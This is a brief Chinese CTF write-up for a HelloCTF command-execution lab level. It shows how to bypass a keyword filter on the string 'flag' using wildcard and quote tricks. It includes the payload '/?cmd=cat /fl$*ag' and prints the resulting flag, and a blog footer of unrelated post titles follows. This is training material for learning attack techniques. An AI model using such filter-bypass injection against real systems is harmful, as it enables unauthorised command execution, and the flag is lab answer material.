HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
CDN3604 小时前
360CDN SDK 游戏盾:轻量化接入 + 强防护实测
运维·游戏·网络安全
黄焖鸡能干四碗4 小时前
网络安全建设实施方案(Word文件参考下载)
大数据·网络·人工智能·安全·web安全·制造
hzhsec5 小时前
MSF-CobaltStrike实现内网socks代理转发上线
服务器·网络·安全·网络安全
CDN36011 小时前
低成本游戏防护:360 SDK 游戏盾使用总结
运维·游戏·网络安全
2401_8442213211 小时前
深入理解K8s中的应用服务:访问、集群与配置
容器·kubernetes·php
Chockmans12 小时前
春秋云境CVE-2021-46436
web安全·网络安全·春秋云境·cve-2021-46436
xiangpanf13 小时前
PHP vs Python:30字看透两大语言差异
开发语言·php
新猿一马13 小时前
服务端安全开发注意事项
数据库·web安全·oracle
xixixi7777714 小时前
5G核心网核心之辨:从服务化架构(SBA)到网络切片的深度实践解析
人工智能·网络安全·信息与通信·通信
IpdataCloud14 小时前
网络安防实战:如何用IP查询工具精准定位风险IP?
网络·经验分享·tcp/ip·网络安全